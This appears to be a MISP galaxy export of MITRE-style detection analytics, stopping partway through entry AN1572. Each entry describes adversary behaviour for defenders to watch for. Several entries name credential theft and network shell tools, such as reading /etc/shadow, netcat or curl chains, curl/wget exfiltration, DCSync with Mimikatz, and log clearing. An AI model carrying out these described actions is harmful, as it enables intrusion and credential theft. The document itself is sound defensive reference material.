external_id AN1342
mitre_platforms ['Office Suite']

Analytic 1234 - AN1234

Adversaries attempt to read sensitive files such as /etc/passwd and /etc/shadow for credential dumping. This may involve access to the files directly via command-line utilities (e.g., cat, less), creation of backup copies, or parsing through post-exploitation frameworks. Multi-event correlation includes elevated process execution, file access/read on sensitive paths, and anomalous read behaviors tied to non-root or unusual users.

Internal MISP references

UUID d6166e3d-2e29-4097-9fb4-c66ce0616897 which can be used as unique global reference for Analytic 1234 - AN1234 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1234
mitre_platforms ['Linux']

Analytic 1532 - AN1532

Use of hcitool, bluetoothctl, or rfcomm to initialize Bluetooth connection paired with recent file reads by the same user or session.

Internal MISP references

UUID 01588556-4b25-4418-b746-9bca0279be2c which can be used as unique global reference for Analytic 1532 - AN1532 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1532
mitre_platforms ['Linux']

Analytic 1253 - AN1253

A process (often after stealing/creating a token) calls CreateProcessWithTokenW/CreateProcessAsUserW or uses runas to spawn a new process whose security context (SID/LogonId/IntegrityLevel) differs from its parent. Chain: (1) suspicious command/API → (2) privileged handle or token duplication/open → (3) new child process running as another user / higher integrity → (4) optional follow‑on privileged/lateral actions.

Internal MISP references

UUID 0929e9c5-2e1a-4cc1-a9c5-df081b180201 which can be used as unique global reference for Analytic 1253 - AN1253 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1253
mitre_platforms ['Windows']

Analytic 1352 - AN1352

Detection of adversary attempts to enumerate containers, pods, nodes, and related resources within containerized environments. Defenders may observe anomalous API calls to Docker or Kubernetes (e.g., 'docker ps', 'kubectl get pods', 'kubectl get nodes'), unusual account activity against the Kubernetes dashboard, or unexpected queries against container metadata endpoints. These events should be correlated with user context and network activity to reveal resource discovery attempts.

Internal MISP references

UUID 3947e311-cada-4eab-b4fd-1ea1f3fc3485 which can be used as unique global reference for Analytic 1352 - AN1352 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1352
mitre_platforms ['Containers']

Analytic 1325 - AN1325

Enumeration of services via native CLI tools (e.g., sc query, tasklist /svc, net start) or API calls via PowerShell and WMI.

Internal MISP references

UUID 475313b7-c26f-44f6-a8f3-09b57f03fcd8 which can be used as unique global reference for Analytic 1325 - AN1325 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1325
mitre_platforms ['Windows']

Analytic 1235 - AN1235

Adversary uses built-in tools like 'net user /add', PowerShell, or WMI to create a local user. Sequence: Account creation event (4720) follows process creation of a suspicious executable (e.g., powershell.exe or net.exe).

Internal MISP references

UUID 4e4c318b-5da0-46f7-aed2-d37828e4831b which can be used as unique global reference for Analytic 1235 - AN1235 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1235
mitre_platforms ['Windows']

Analytic 1523 - AN1523

Series of failed logins from loginwindow or sshd with repeated usernames or password prompts

Internal MISP references

UUID 53336c8f-a218-462a-b97c-aac07cf96077 which can be used as unique global reference for Analytic 1523 - AN1523 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1523
mitre_platforms ['macOS']

Analytic 1623 - AN1623

Adversary compromises a Linux-based web server and modifies hosted web files by exploiting upload vulnerabilities, remote code execution, or replacing index.html via SSH/webshell.

Internal MISP references

UUID 1affb8e9-25b4-49c1-b290-687e9696fa83 which can be used as unique global reference for Analytic 1623 - AN1623 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1623
mitre_platforms ['Linux']

Analytic 1326 - AN1326

Execution of service management commands like systemctl list-units, service --status-all, or direct reading of /etc/init.d.

Internal MISP references

UUID 20879a60-f16c-4a90-bd71-2c8865c99481 which can be used as unique global reference for Analytic 1326 - AN1326 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1326
mitre_platforms ['Linux']

Analytic 1263 - AN1263

Rapid login failures across different users from a single IP address, targeting SSH or PAM login with distinct username-password pairs

Internal MISP references

UUID 95d381e5-f2d6-4164-9917-57f9b070333b which can be used as unique global reference for Analytic 1263 - AN1263 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1263
mitre_platforms ['Linux']

Analytic 1632 - AN1632

Detects unauthorized invocation of replication operations (DCSync) via Directory Replication Service (DRS), often executed by threat actors using Mimikatz or similar tools from non-DC endpoints.

Internal MISP references

UUID 9a68f1a7-65f0-4eef-a711-888bccbeb0d5 which can be used as unique global reference for Analytic 1632 - AN1632 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1632
mitre_platforms ['Windows']

Analytic 1236 - AN1236

Local user accounts are created via binaries like 'useradd', 'adduser', or by editing passwd/shadow. Behavior chain includes execution of user management binaries or modification of user database files.

Internal MISP references

UUID ee065e5f-5a04-49bd-b2b6-33b404ac37c7 which can be used as unique global reference for Analytic 1236 - AN1236 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1236
mitre_platforms ['Linux']

Analytic 1362 - AN1362

Monitor server and endpoint logs for unusual outbound network connections to cryptocurrency nodes, unauthorized scripts accessing financial systems, or automation targeting payment file formats. Detect curl/wget activity aimed at exfiltrating transaction data or credentials from financial apps.

Internal MISP references

UUID efdca1e1-5a4a-4039-99ab-1cdb7e50e52c which can be used as unique global reference for Analytic 1362 - AN1362 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1362
mitre_platforms ['Linux']

Analytic 1237 - AN1237

Account creation using 'dscl -create' or via GUI tools. Detection involves command execution and file changes to the local directory services database.

Internal MISP references

UUID 45e8fdaf-60cc-46db-a9fd-5dc18c8db6bb which can be used as unique global reference for Analytic 1237 - AN1237 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1237
mitre_platforms ['macOS']

Analytic 1372 - AN1372

Detection of adversaries disabling cloud monitoring and logging agents such as CloudWatch, Google Cloud Monitoring, or Azure Monitor by API calls or agent process termination.

Internal MISP references

UUID 5d329e39-a38b-47cd-8d3d-fa7515280fd7 which can be used as unique global reference for Analytic 1372 - AN1372 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1372
mitre_platforms ['IaaS']

Analytic 1273 - AN1273

Hidden file system use through APFS containers or custom plist configuration. Defender view: anomalous use of hdiutil or diskutil to attach hidden partitions, modification of plist entries tied to system volumes, or suspicious raw disk access.

Internal MISP references

UUID 82908b5f-fa84-4420-bb1c-cc77e12e9d3c which can be used as unique global reference for Analytic 1273 - AN1273 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1273
mitre_platforms ['macOS']

Analytic 1327 - AN1327

Discovery via launchctl commands, or process enumeration using ps aux | grep com.apple. to identify daemons and services.

Internal MISP references

UUID 8f654b08-222f-4fc0-83cc-ab871e290d1e which can be used as unique global reference for Analytic 1327 - AN1327 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1327
mitre_platforms ['macOS']

Analytic 1723 - AN1723

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID 52a370ec-dca2-45e0-bba7-7384816945e8 which can be used as unique global reference for Analytic 1723 - AN1723 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1723
mitre_platforms ['Android']

Analytic 1732 - AN1732

Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.

Internal MISP references

UUID 6c776c7a-0e2f-4963-9485-aa90149ae68e which can be used as unique global reference for Analytic 1732 - AN1732 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1732
mitre_platforms ['iOS']

Analytic 1382 - AN1382

Detects GCC or Clang invoked on suspicious file paths (e.g., /tmp/, ~/Downloads) with output to executable binaries, followed by execution or outbound traffic from these binaries.

Internal MISP references

UUID 774d555e-b94b-4dbd-bc3b-fb60d55e6e2d which can be used as unique global reference for Analytic 1382 - AN1382 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1382
mitre_platforms ['Linux']

Analytic 1283 - AN1283

Detection of default account usage such as Guest or Administrator performing interactive or remote logons on systems outside of installation or maintenance windows.

Internal MISP references

UUID 7a3dd710-39a7-4327-8d3b-150c50b2c680 which can be used as unique global reference for Analytic 1283 - AN1283 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1283
mitre_platforms ['Windows']

Analytic 1238 - AN1238

Account created using esxcli commands. Sequence includes esxcli execution and successful modification to account DB.

Internal MISP references

UUID b7a63a7c-e8c2-4a25-becf-299ea45996e5 which can be used as unique global reference for Analytic 1238 - AN1238 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1238
mitre_platforms ['ESXi']

Analytic 1328 - AN1328

Spike in object access from new IAM user or role followed by data exfiltration to external IPs

Internal MISP references

UUID d9a1ace1-6307-4db7-925f-67057361e66a which can be used as unique global reference for Analytic 1328 - AN1328 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1328
mitre_platforms ['IaaS']

Analytic 1832 - AN1832

Application vetting services could look for usage of the READ_PRIVILEGED_PHONE_STATE Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.

Internal MISP references

UUID 0d358eda-4f7e-462e-8201-96d8a661001d which can be used as unique global reference for Analytic 1832 - AN1832 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1832
mitre_platforms ['iOS']

Analytic 1823 - AN1823

Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.

Internal MISP references

UUID ffcee6e2-02dd-4053-92a3-8600dd70445e which can be used as unique global reference for Analytic 1823 - AN1823 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1823
mitre_platforms ['Android']

Analytic 1329 - AN1329

OAuth token granted to external app followed by download of high-volume files in OneDrive/Google Drive

Internal MISP references

UUID 8226ce94-1f5b-4ab0-b0bc-92f1d225eaa4 which can be used as unique global reference for Analytic 1329 - AN1329 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1329
mitre_platforms ['SaaS']

Analytic 1239 - AN1239

Account created in a running container (e.g., via 'useradd' or by modifying /etc/passwd directly). Detectable via runtime telemetry (e.g., Falco or eBPF hooks).

Internal MISP references

UUID ac204e03-5c8c-4e29-929c-780145a98669 which can be used as unique global reference for Analytic 1239 - AN1239 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1239
mitre_platforms ['Containers']

Analytic 1293 - AN1293

Defenders may observe adversary attempts to patch system images by monitoring for anomalous file transfers (TFTP, SCP, FTP) of image files, unauthorized CLI commands altering boot system variables, integrity check mismatches between running and baseline OS images, and runtime memory manipulation attempts. Suspicious sequences include uploading a new image, modifying boot parameters, and subsequent reload/reboot of the device. In-memory patching attempts may manifest as debug commands or boot loader manipulation inconsistent with normal administrative activity.

Internal MISP references

UUID bf64c48c-5834-426c-be21-6db0efbc7909 which can be used as unique global reference for Analytic 1293 - AN1293 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1293
mitre_platforms ['Network Devices']

Analytic 1392 - AN1392

Detects unexpected encrypted egress traffic from management services (e.g., hostd) or guest VMs utilizing symmetric encryption without traditional protocols (e.g., FTP with embedded AES ciphertext).

Internal MISP references

UUID d73a1356-7f4f-4f54-afca-437736e5f53c which can be used as unique global reference for Analytic 1392 - AN1392 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1392
mitre_platforms ['ESXi']

Analytic 1244 - AN1244

Detect user-initiated kextload commands or modifications to /Library/Extensions. Correlate with changes to KextPolicy database or unauthorized developer signing identities. Alert on attempts to disable SIP or load legacy extensions from unsigned sources.

Internal MISP references

UUID 092689c7-be8a-4d11-99d8-7dd96afa938d which can be used as unique global reference for Analytic 1244 - AN1244 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1244
mitre_platforms ['macOS']

Analytic 1442 - AN1442

Detects AppleScript or Objective-C usage to generate fake authentication windows (e.g., using display dialog or NSAlert) from user-launched or persistence-related processes.

Internal MISP references

UUID 3b327a8f-0ea3-4848-b34a-58029e5edf57 which can be used as unique global reference for Analytic 1442 - AN1442 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1442
mitre_platforms ['macOS']

Analytic 1424 - AN1424

Token retrieval from instance metadata endpoints such as AWS IMDS or Azure IMDS, followed by API usage using the obtained token from non-standard applications.

Internal MISP references

UUID 70f6482e-e93b-45a5-9b8c-ba7fd0c8220a which can be used as unique global reference for Analytic 1424 - AN1424 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1424
mitre_platforms ['IaaS']

Analytic 1245 - AN1245

Defenders can identify PowerShell profile-based persistence by correlating file creation or modification in known profile locations with subsequent PowerShell process launches that do not use the -NoProfile flag. Profile scripts loading unusual modules or launching external programs, particularly under elevated contexts, are suspicious and may represent adversary persistence or privilege escalation.

Internal MISP references

UUID 298d1a46-ec12-4cd2-acce-7e0f849c384d which can be used as unique global reference for Analytic 1245 - AN1245 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1245
mitre_platforms ['Windows']

Analytic 1254 - AN1254

Anomalous use of ICMP or UDP by non-network service processes for data exfiltration or remote control, especially if traffic bypasses proxy infrastructure or shows unusual flow patterns.

Internal MISP references

UUID 4412fb07-9a44-49de-80af-8746b0be3865 which can be used as unique global reference for Analytic 1254 - AN1254 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1254
mitre_platforms ['Windows']

Analytic 1452 - AN1452

Process creation and command-line execution of native system discovery utilities such as systeminfo, hostname, wmic, or use of PowerShell/WMI for system enumeration.

Internal MISP references

UUID 54bfcc92-e04c-4eac-9aa2-c10b7574088c which can be used as unique global reference for Analytic 1452 - AN1452 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1452
mitre_platforms ['Windows']

Analytic 1542 - AN1542

Monitor CLI 'reload' commands issued without scheduled maintenance, and correlate to TACACS+/AAA logs for privilege validation.

Internal MISP references

UUID 9c70d5b3-8748-4f88-8fd8-95f79c73d250 which can be used as unique global reference for Analytic 1542 - AN1542 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1542
mitre_platforms ['Network Devices']

Analytic 1425 - AN1425

Unusual OAuth app registration followed by user-granted OAuth tokens and subsequent high-privilege resource access via those tokens.

Internal MISP references

UUID a064fdd2-4293-4aff-a91b-e06ac8bf9262 which can be used as unique global reference for Analytic 1425 - AN1425 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1425
mitre_platforms ['Identity Provider']

Analytic 1524 - AN1524

Multiple failed sign-in attempts from external sources across many users followed by success from the same IP

Internal MISP references

UUID f525a464-a4e5-40fb-831a-162af2f232e7 which can be used as unique global reference for Analytic 1524 - AN1524 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1524
mitre_platforms ['Identity Provider']

Analytic 1246 - AN1246

Detection correlates abnormal installation or modification of root or code-signing certificates, creation/modification of suspicious registry keys for trust providers, and unusual module loads from non-standard locations. Identifies unsigned or improperly signed executables bypassing trust prompts, combined with persistence artifacts.

Internal MISP references

UUID 35b0b263-f85d-4e6a-8bcb-5e2c1a9da080 which can be used as unique global reference for Analytic 1246 - AN1246 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1246
mitre_platforms ['Windows']

Analytic 1462 - AN1462

Execution of files with reversed filename extensions using Unicode RTLO character. Frequently used to deceive Gatekeeper and users in Safari or Mail-based phishing.

Internal MISP references

UUID 667326a7-1f31-4ef1-92c1-6cb5241dadcf which can be used as unique global reference for Analytic 1462 - AN1462 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1462
mitre_platforms ['macOS']

Analytic 1642 - AN1642

Suspicious access to password manager vaults (KeePassXC, gnome-keyring, pass) via memory scraping or unauthorized file reads. Detects unusual command execution involving gdb/strace attached to password manager processes.

Internal MISP references

UUID 93fd8592-d8ce-4b5e-b095-71cd66062298 which can be used as unique global reference for Analytic 1642 - AN1642 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1642
mitre_platforms ['Linux']

Analytic 1624 - AN1624

Adversary modifies web-facing content on macOS via web development environments like MAMP or misconfigured Apache instances, typically with access to the hosting user account or via persistence tools.

Internal MISP references

UUID c9b3d194-843a-4f65-ad8b-4b3192571fc5 which can be used as unique global reference for Analytic 1624 - AN1624 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1624
mitre_platforms ['macOS']

Analytic 1426 - AN1426

Use of OAuth tokens by third-party apps to access user mail, calendar, or SharePoint resources where the token was granted recently or via spearphishing.

Internal MISP references

UUID da365d5b-c955-46f6-99c2-cd57a3560a57 which can be used as unique global reference for Analytic 1426 - AN1426 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1426
mitre_platforms ['Office Suite']

Analytic 1264 - AN1264

Burst of failed authentications with rotating usernames against loginwindow or remote management service using reused breached credentials

Internal MISP references

UUID e2f104ac-b21a-4c48-8987-3e0ad73997df which can be used as unique global reference for Analytic 1264 - AN1264 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1264
mitre_platforms ['macOS']

Analytic 1427 - AN1427

Programmatic access to user content via stolen access tokens in platforms like Slack, GitHub, Google Workspace — especially from new IPs, apps, or excessive resource access.

Internal MISP references

UUID 0677b819-0586-454c-9f4d-c861ccaf1b73 which can be used as unique global reference for Analytic 1427 - AN1427 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1427
mitre_platforms ['SaaS']

Analytic 1247 - AN1247

Detection monitors extended attribute manipulation (xattr) to strip quarantine or trust metadata, anomalous installation of root certificates in /etc/ssl or /usr/local/share/ca-certificates, and unauthorized modification of system trust stores. Correlates with unexpected process execution involving package managers or custom certificate utilities.

Internal MISP references

UUID 06ec22c9-b32f-49bc-81cc-ed5cee622493 which can be used as unique global reference for Analytic 1247 - AN1247 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1247
mitre_platforms ['Linux']

Analytic 1472 - AN1472

Detects behavioral sequence where an adversary gains elevated privileges and clears event logs using native binaries (e.g., wevtutil), PowerShell, or direct file deletion of .evtx files.

Internal MISP references

UUID 6482fa33-322b-47e4-a9f7-c2bcc92d132a which can be used as unique global reference for Analytic 1472 - AN1472 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1472
mitre_platforms ['Windows']

Analytic 1274 - AN1274

Detects anomalous network traffic on UDP 5355 (LLMNR) and UDP 137 (NBT-NS) combined with unauthorized SMB relay attempts, registry modifications re-enabling multicast name resolution, or suspicious service creation indicative of adversary-in-the-middle credential interception.

Internal MISP references

UUID eb031858-bf91-476e-8248-2c54ef0f0864 which can be used as unique global reference for Analytic 1274 - AN1274 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1274
mitre_platforms ['Windows']

Analytic 1742 - AN1742

Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells. Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to newly created processes and their parameters, potentially detecting unwanted or malicious shells. Application vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense) Mobile Threat Defense (MTD) with lower-level OS APIs integrations may have access to running processes and their parameters, potentially detecting unwanted or malicious shells.

Internal MISP references

UUID 77c81bf1-beef-429a-a426-a716b489383a which can be used as unique global reference for Analytic 1742 - AN1742 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1742
mitre_platforms ['iOS']

Analytic 1724 - AN1724

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID 81a49b9b-c8cf-438c-bea0-e09149f50b34 which can be used as unique global reference for Analytic 1724 - AN1724 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1724
mitre_platforms ['iOS']

Analytic 1482 - AN1482

1) pkg/notarization installs from atypical sources or with Gatekeeper/AMFI warnings; 2) new Mach-O written into /Applications or ~/Library paths or substitution of signed components; 3) first run from installer spawns unsigned children or exfil.

Internal MISP references

UUID 779b2e27-9318-46a3-aeec-765f5fb09de3 which can be used as unique global reference for Analytic 1482 - AN1482 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1482
mitre_platforms ['macOS']

Analytic 1248 - AN1248

Detection monitors modification of code signing attributes, Gatekeeper/quarantine flags, and insertion of new trust certificates via security add-trusted-cert. Identifies adversary use of xattr to strip quarantine flags from downloaded binaries. Correlates with abnormal module loads bypassing SIP protections.

Internal MISP references

UUID 94340be7-068e-446a-bca2-d414b66912fc which can be used as unique global reference for Analytic 1248 - AN1248 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1248
mitre_platforms ['macOS']

Analytic 1284 - AN1284

Monitoring for SSH logins from default accounts such as 'root', especially when login is via password and not key-based authentication.

Internal MISP references

UUID c804a181-f0be-41dd-81ce-95e0a3e5245d which can be used as unique global reference for Analytic 1284 - AN1284 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1284
mitre_platforms ['Linux']

Analytic 1428 - AN1428

Detects the execution of scripting or command interpreters (e.g., powershell.exe, cmd.exe, wscript.exe) outside expected administrative time windows or from abnormal user contexts, often followed by encoded/obfuscated arguments or secondary execution events.

Internal MISP references

UUID fee823fd-f31e-4898-820e-322e49574438 which can be used as unique global reference for Analytic 1428 - AN1428 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1428
mitre_platforms ['Windows']

Analytic 1824 - AN1824

Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.

Internal MISP references

UUID 7a209f60-7f43-407f-b5bd-7877e10222ee which can be used as unique global reference for Analytic 1824 - AN1824 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1824
mitre_platforms ['iOS']

Analytic 1842 - AN1842

The user can examine the list of all installed applications, including those with a suppressed icon, in the device settings. If the user is redirected to the device settings when tapping an application’s icon, they should inspect the application to ensure it is genuine. Application vetting services could potentially detect the usage of APIs intended for suppressing the application’s icon.

Internal MISP references

UUID 944c3eaa-2809-4db3-ac7c-d1868e205793 which can be used as unique global reference for Analytic 1842 - AN1842 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1842
mitre_platforms ['Android']

Analytic 1249 - AN1249

Defenders may observe suspicious SNMP MIB enumeration through abnormal queries for large sets of OIDs, repeated SNMP GETBULK/GETNEXT requests, or queries originating from non-administrative IP addresses. Anomalous use of community strings, authentication failures, or enumeration activity outside maintenance windows may also indicate attempts to dump MIB contents. Correlation across syslog, NetFlow, and SNMP audit data can reveal chains of behavior such as repeated authentication failures followed by successful large-scale OID retrieval.

Internal MISP references

UUID 282d9231-942a-4b97-875c-659aa2c41971 which can be used as unique global reference for Analytic 1249 - AN1249 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1249
mitre_platforms ['Network Devices']

Analytic 1429 - AN1429

Detects use of shell interpreters (e.g., bash, sh, python, perl) initiated by users or processes not normally executing them, especially when chaining suspicious utilities like netcat, curl, or ssh.

Internal MISP references

UUID 3b02d81a-8684-4fc8-8364-127f30359282 which can be used as unique global reference for Analytic 1429 - AN1429 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1429
mitre_platforms ['Linux']

Analytic 1942 - AN1942

Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.

Internal MISP references

UUID 5c5afe0d-b967-49ac-8c3e-eeb9cc01667d which can be used as unique global reference for Analytic 1942 - AN1942 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1942
mitre_platforms ['PRE']

Analytic 1492 - AN1492

Ephemeral or unauthorized container instantiation using public images (e.g., from DockerHub) that initiate high CPU usage shortly after startup. Often scheduled via Kubernetes or Docker socket abuse.

Internal MISP references

UUID 7ac026eb-9a3b-49fe-b7ec-7261cb6d6191 which can be used as unique global reference for Analytic 1492 - AN1492 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1492
mitre_platforms ['Containers']

Analytic 1294 - AN1294

Untrusted processes creating outbound TLS/HTTPS connections with malformed certificates or header fields, often mismatched with target service behavior. Detects protocol impersonation attempts via traffic metadata analysis and host process lineage.

Internal MISP references

UUID bcf48294-2388-4ae6-be22-f9038c54e1db which can be used as unique global reference for Analytic 1294 - AN1294 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1294
mitre_platforms ['Windows']

Analytic 1525 - AN1525

Login attempt failures over SNMP, Telnet, or SSH interface, often reflected in logs or syslog events

Internal MISP references

UUID 13556e3f-80f0-4aac-83f0-0d6c706e76ff which can be used as unique global reference for Analytic 1525 - AN1525 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1525
mitre_platforms ['Network Devices']

Analytic 1552 - AN1552

Linux environmental validation behavioral chain: (1) Intensive system enumeration through command execution (uname, hostname, ifconfig, lsblk, mount), (2) File system reconnaissance targeting specific paths, network configurations, and installed packages, (3) Process and user enumeration to validate target environment characteristics, (4) Conditional script execution or binary activation based on environmental criteria, (5) Network connectivity validation and external IP address resolution for geolocation verification

Internal MISP references

UUID 31027842-f02c-4bc3-8cd6-3e4b533da5ac which can be used as unique global reference for Analytic 1552 - AN1552 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1552
mitre_platforms ['Linux']

Analytic 1255 - AN1255

ICMP or raw socket traffic generated by user-mode processes like bash, Python, or nc, typically using ping, hping3, or crafted packets via libpcap or scapy.

Internal MISP references

UUID 7d0a3871-8cee-47bd-8829-637e132c98f7 which can be used as unique global reference for Analytic 1255 - AN1255 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1255
mitre_platforms ['Linux']

Analytic 1526 - AN1526

Password guessing attempts against web-based apps (e.g., Dropbox, Google Workspace) reflected in API or sign-in logs

Internal MISP references

UUID 1d8bc80f-8719-41f0-a73e-127d6830f516 which can be used as unique global reference for Analytic 1526 - AN1526 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1526
mitre_platforms ['SaaS']

Analytic 1265 - AN1265

Same source IP performing multiple authentication attempts using known breached username/password combinations across different identities in Azure AD, Okta, or Duo

Internal MISP references

UUID 24e6cefb-6e1c-4676-9bb8-74f6a731703c which can be used as unique global reference for Analytic 1265 - AN1265 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1265
mitre_platforms ['Identity Provider']

Analytic 1256 - AN1256

Unsigned binaries or interpreted scripts initiating non-standard protocols (ICMP, UDP, SOCKS) outside of baseline network behavior.

Internal MISP references

UUID 4742e058-a301-47e1-b594-8daa8eabfc79 which can be used as unique global reference for Analytic 1256 - AN1256 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1256
mitre_platforms ['macOS']

Analytic 1625 - AN1625

Adversary modifies content in cloud-hosted websites (e.g., AWS S3-backed, Azure Blob-hosted sites) by gaining access to management consoles or APIs and uploading altered HTML/JS files.

Internal MISP references

UUID afd585f3-20fa-4bd8-8930-243cb5dbe5f8 which can be used as unique global reference for Analytic 1625 - AN1625 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1625
mitre_platforms ['IaaS']

Analytic 1562 - AN1562

Processes executing commands to query system locale and language settings, such as 'locale', 'echo $LANG', or parsing environment variables. Suspicious activity is indicated by these commands being run by unusual users, automation scripts, or non-administrative processes.

Internal MISP references

UUID c625c090-edcc-431a-a2fb-c31e4eb5f2cf which can be used as unique global reference for Analytic 1562 - AN1562 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1562
mitre_platforms ['Linux']

Analytic 1652 - AN1652

The user can view a list of device administrators in device settings and revoke permission where appropriate. Applications that request device administrator permissions should be scrutinized further for malicious behavior.

Internal MISP references

UUID a5c4230b-7064-4863-9a60-e0565042d452 which can be used as unique global reference for Analytic 1652 - AN1652 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1652
mitre_platforms ['Android']

Analytic 1572 - AN1572

Processes such as curl, wget, rclone, or custom scripts executing uploads to cloud storage endpoints. Defender perspective: detect chained events where tar/gzip is executed to compress files followed by HTTPS PUT/POST requests to known storage services.

Internal MISP references

